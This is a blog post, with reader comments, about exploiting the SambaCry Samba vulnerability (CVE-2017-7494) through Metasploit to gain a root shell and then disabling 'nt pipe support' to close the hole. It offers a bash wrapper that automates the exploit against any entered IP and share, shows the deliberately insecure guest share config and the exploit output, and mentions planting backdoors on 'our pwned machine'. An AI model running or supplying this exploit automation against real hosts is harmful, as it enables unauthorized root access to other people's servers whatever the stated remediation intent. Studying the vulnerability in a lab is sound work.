Patching SambaCry by exploiting it

There has been more than enough of coverage how to hack into a Linux machine running a vulnerable Samba via CVE-2017-7494 (SambaCry) , but what about reversing the evil way for good ? When we get a remote root shell on the target machine we might as well fix the SambaCry vulnerability right ?

(Also to keep other bots/kiddies off our pwned machine once we have all the backdoors in place….)

So how do we do this, or how do we automate it ? Not as easy as it looks (Should be a piece of cake for seasoned C coders out there to re-write the part where we call for /bin/sh in the shared object .so file in the first place and run some remediation sequence of commands. A quick and simple one would be something similar

# sed -i '/\[global\]/a nt pipe support = off ' /etc/samba/smb.conf
# /etc/init.d/samba restart

I have played around with this idea for a while now and turn to you for suggestion on improving the code

In my test environment I have a Debian8 Linux running the vulnerable version of Samba 4.2.14+dfsg-0+deb8u5 with the following “unsecure” configuration (to allow anonymous upload for example)

[Share]
 comment = Share 
 path = /DATA
 guest ok = yes 
 browseable = yes 
 writable = yes

So I write a little helper for Metasploit to load the exploit/linux/samba/is_known_pipename for Guest write access (you can re-write it and add username/passwords variables to the code .. should be really simple)

#!/bin/bash
clear
echo "***************************************************************"
echo " EXPLOITER SAMBACRY PaTcHeR for GUEST USER "
echo " Lets fix Samba via this exploit and patch it "
echo "***************************************************************"
echo -e "What IP of remote Samba ? \c"
read host
echo -e "What is the share name ? : \c"
read name 
echo '[*] Checking if metasploit is present..'
if [ -x ./msfconsole ]; then
echo '[*] Found msfconsole in current path ........ good'
else
 echo '[-] No msfconsole in path...make sure you have this script in your metasploit-framework path'
exit 0
fi

echo 'use exploit/linux/samba/is_known_pipename' > samba.rc
echo 'set PAYLOAD cmd/unix/interact' >> samba.rc
echo -n 'set RHOST ' >> samba.rc
echo -n $host >> samba.rc 
echo '' >> samba.rc 
echo -n 'set SMB_SHARE_NAME ' >> samba.rc 
echo -n $name >> samba.rc 
echo '' >> samba.rc
echo ' set ExitOnSession false' >> samba.rc 
echo 'run' >> samba.rc

echo 'hostname' >> samba.rc 
echo '' >> samba.rc
echo '' >> samba.rc
echo './msfconsole -r samba.rc' > fix-samba.sh 
chmod +x ./fix-samba.sh 
./fix-samba.sh

Once I run this I get a remote root shell via (cmd/unix/interact) which unfortunately is not scriptable to run custom commands that could remediate the SambaCry bug.

Payload advanced options (cmd/unix/interact):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 AutoRunScript no A script to run automatically on session creation.
 InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)

The cmd/unix/interact root shell is not a full shell that would allow you to run the apt-get upgrade for example since it is missing all the profile settings for a proper shell (A nice description is here https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ )

So we are stuck with a limited root shell where vi won’t really work, but sed will definitely do.  So this is exactly what I ran on the rooted Debian8

sed -i '/\[global\]/a nt pipe support = off ' /etc/samba/smb.conf 
/etc/init.d/samba reload

Once I tried to reload the exploit via Metasploit it failed :)

resource (samba.rc)> run
[*] 192.168.11.7:445 - Using location \\192.168.11.7\Share\ for the path
[*] 192.168.11.7:445 - Retrieving the remote path of the share 'Share'
[-] 192.168.11.7:445 - Exploit failed: TypeError no implicit conversion of Symbol into Integer
[*] Exploit completed, but no session was created.

Finally here is my video of the above efforts ..

 

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

5 Responses to Patching SambaCry by exploiting it

  1. alberttrotter says:

    please explain the following lines
    echo ‘./msfconsole -r samba.rc’ > fix-samba.sh
    chmod +x ./fix-samba.sh
    ./fix-samba.sh

  2. Pingback: IT Security Weekend Catch Up – July 24, 2017 – BadCyber

  3. Pingback: 【知识】7月24日 - 每日安全知识热点 - 莹莹之色

  4. Pingback: 【知识】7月24日 – 每日安全知识热点 – 安百科技

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s